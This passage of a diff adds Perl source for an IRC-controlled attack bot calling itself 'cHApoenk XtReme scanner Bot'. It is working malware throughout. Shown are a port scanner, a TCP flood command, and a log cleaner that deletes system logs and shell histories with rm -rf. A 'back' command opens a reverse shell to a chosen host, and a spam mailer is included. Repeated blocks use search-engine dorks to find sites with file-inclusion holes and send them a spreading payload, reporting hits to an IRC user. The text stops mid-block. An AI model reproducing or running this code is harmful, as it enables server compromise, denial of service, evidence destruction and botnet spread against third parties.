+	foreach $x (0..(@ltt - 1)) {
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Milw0rm Hack4+)14 $bug[$x] -3 $ltt[$x]");
+	sleep 1;
+}}
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#      Portscan      # 
+#                    #
+######################
+
+if ($funcarg =~ /^port (.*)/) {
+  my $hostip="$1";
+  my
+  @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
+  my (@aberta, %porta_banner);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) scanning for open ports on  4".$1." started .");
+  foreach my $porta (@portas)  {
+    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
+    'tcp', Timeout => 4);
+    if ($scansock) {
+      push (@aberta, $porta);
+      $scansock->close;
+    }
+  }
+  
+  if (@aberta) {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) Open ports founded:5 @aberta");
+    } else {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) No open ports foundend.");
+  }
+}
+
+######################
+#  End of  Portscan  # 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#        Nmap        #  
+#                    #
+######################
+   if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
+         my $hostip="$1";
+         my $portstart = "$2";
+         my $portend = "$3";
+         my (@abertas, %porta_banner); 
+       sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) :4 $1 (4+Port4+) 4 $2-$3");
+       foreach my $porta ($portstart..$portend){
+               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); 
+    if ($scansock) {
+                 push (@abertas, $porta);
+                 $scansock->close;
+                 if ($xstats){
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) Founded 4 $porta"."/Open"); 
+                 }
+               }
+             }
+             if (@abertas) {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) Complete ");
+             } else {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) No open ports have been founded 13");
+             }
+			 }
+######################
+#    End of Nmap     #  
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#    Log Cleaner     #  
+#                    #
+######################
+if ($funcarg =~ /^logcleaner/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) This process can be long, just wait"); 
+    system 'rm -rf /var/log/lastlog';
+    system 'rm -rf /var/log/wtmp';
+	system 'rm -rf /etc/wtmp';
+	system 'rm -rf /var/run/utmp';
+	system 'rm -rf /etc/utmp';
+	system 'rm -rf /var/log';
+	system 'rm -rf /var/logs';
+	system 'rm -rf /var/adm';
+	system 'rm -rf /var/apache/log';
+	system 'rm -rf /var/apache/logs';
+	system 'rm -rf /usr/local/apache/log'; 
+	system 'rm -rf /usr/local/apache/logs';
+	system 'rm -rf /root/.bash_history';
+	system 'rm -rf /root/.ksh_history';
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) All default log and bash_history files erased"); 
+		sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) Now Erasing the rest of the machine log files");
+	system 'find / -name *.bash_history -exec rm -rf {} \;';
+	system 'find / -name *.bash_logout -exec rm -rf {} \;';
+	system 'find / -name "log*" -exec rm -rf {} \;';
+	system 'find / -name *.log -exec rm -rf {} \;';
+		sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) Done! All logs erased"); 
+      }
+######################
+# End of Log Cleaner #  
+#                    #
+######################
+# 
+# cHApoenk XtReme scanner Bot
+#
+######################
+#       MAILER       #  
+#                    #
+######################
+# For mailing use :
+# !bgr @sendmail <subject> <sender> <recipient> <message>
+#
+######################
+if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Mailer4+) Sending Mail to :10 $3");
+$subject = $1;
+$sender = $2;
+$recipient = $3; 
+@corpo = $4;
+$mailtype = "content-type: text/html";
+$sendmail = '/usr/sbin/sendmail';
+open (SENDMAIL, "| $sendmail -t");
+print SENDMAIL "$mailtype\n";
+print SENDMAIL "Subject: $subject\n"; 
+print SENDMAIL "From: $sender\n";
+print SENDMAIL "To: $recipient\n\n";
+print SENDMAIL "@corpo\n\n";
+close (SENDMAIL);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Mailer4+) Mail Sended To :10 $recipient"); 
+}
+######################
+#   End of MAILER    #  
+#                    #
+######################
+######################
+#  Join And Part     # 
+#                    #
+######################
+           if ($funcarg =~ /^join (.*)/) {
+              sendraw($IRC_cur_socket, "JOIN ".$1);
+           }
+           if ($funcarg =~ /^part (.*)/) {
+              sendraw($IRC_cur_socket, "PART ".$1);
+           }
+		   
+######################
+#End of Join And Part# 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#     TCPFlood       # 
+#                    #
+######################
+
+if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+TCPKill4+) Attacking 4 ".$1.":".$2." for 4 ".$3." seconds.");
+  my $itime = time;
+  my ($cur_time);
+  $cur_time = time - $itime;
+  while ($3>$cur_time){
+  $cur_time = time - $itime;
+  &tcpflooder("$1","$2","$3");
+}
+sendraw($IRC_cur_socket,"PRIVMSG $printl :(4+TCPKill4+) Attack done 4 ".$1.":".$2.".");
+}
+######################
+#  End of TCPFlood   # 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#   Back Connect     # 
+#                    #
+######################
+if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
+my $host = "$1";
+my $porta = "$2";
+my $proto = getprotobyname('tcp');
+my $iaddr = inet_aton($host);
+my $paddr = sockaddr_in($porta, $iaddr);
+my $shell = "/bin/sh -i";
+if ($^O eq "MSWin32") {
+  $shell = "cmd.exe";
+}
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
+connect(SOCKET, $paddr) or die "connect: $!";
+open(STDIN, ">&SOCKET");
+open(STDOUT, ">&SOCKET");
+open(STDERR, ">&SOCKET");
+system("$shell");
+close(STDIN);
+close(STDOUT);
+close(STDERR);
+if ($estatisticas)
+{
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+BackConnect4+) Connecting to 4 $host:$porta");
+}
+}
+######################
+#End of  Back Connect# 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#    EXTREME scanNER # 
+#                    #
+######################
+######################################################################
+#################### GOOGLE
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+### Start Message
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Initializing4+) Backdoor scan is for12 $bug and12 $dork");
+### End of Start Message
+# Starting The Search Engine
+	my @google=&googlet($dork);
+#
+push(my @tot, @google);
+#
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Google4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Google4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### AllTheWeb
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @alltheweb=&allthewebt($dork);
+	my @allweb=&standard($dork);
+#
+push(my @tot, @alltheweb, @allweb);
+#
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+AllWeb4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+AllWeb4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### LYCOS
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @lylist=&lycos($dork);
+push(my @lybyp,@lylist);
+#
+push(my @tot, @lybyp);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Lycos4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Lycos4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafemMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### Yahoo
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @ylist=&yahoo($dork);
+	my @yalist=&yahooa($dork);
+	my @yblist=&yahoob($dork);
+	my @yclist=&yahooc($dork);
+	my @ydlist=&yahood($dork);
+		push(my @yahoobypass, @ylist, @yalist, @yblist, @yclist, @ydlist );	
+#
+push(my @tot, @yahoobypass);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Yahoo4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Yahoo4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MSN
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @mlist=&msn($dork);
+push(my @tot, @mlist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MSN4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MSN4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### SEARCH
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @slist=&search($dork);
+push(my @tot, @slist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Search4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Search4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### FireBall
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @fireball=fireball($dork);
+push(my @tot, @fireball);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+FireBall4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+FireBall4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### UOL
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @ulist=&uol($dork);
+push(my @tot, @ulist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+UOL4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+UOL4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### ALTAVISTA
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @alist=&altavista($dork);
+	my @ablist=&altavistade($dork);
+	my @aclist=&altavistaus($dork);
+push(my @tot, @alist,@ablist,@aclist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Altavista4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Altavista4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### HOTBOT
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @hlist=&hotbot($dork);
+push(my @tot, @hlist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+HotBot4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+HotBot4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
